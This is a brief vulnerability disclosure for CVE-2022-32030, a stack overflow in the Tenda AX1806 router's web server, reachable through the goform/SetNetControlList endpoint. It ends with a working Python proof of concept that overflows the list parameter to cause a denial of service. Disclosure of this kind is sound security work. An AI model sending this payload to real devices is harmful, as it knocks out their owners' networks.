Headline
CVE-2022-32030: IoT-vuln/Tenda/AX1806/formSetQosBand at main · d1tto/IoT-vuln
Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the list parameter in the function formSetQosBand.
Overview
- The device’s official website: https://www.tenda.com.cn/product/AX1806.html
- Firmware download website: https://www.tenda.com.cn/download/detail-3306.html
Affected version
v1.0.0.1
Vulnerability details
tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetQosBand function, which can be accessed via the URL goform/SetNetControlList.
PoC
Poc of Denial of Service(DoS)
import requests
data = { b"list": b’A’*0x400+b’\n’ } res = requests.post("http://127.0.0.1/goform/SetNetControlList", data=data) print(res.content)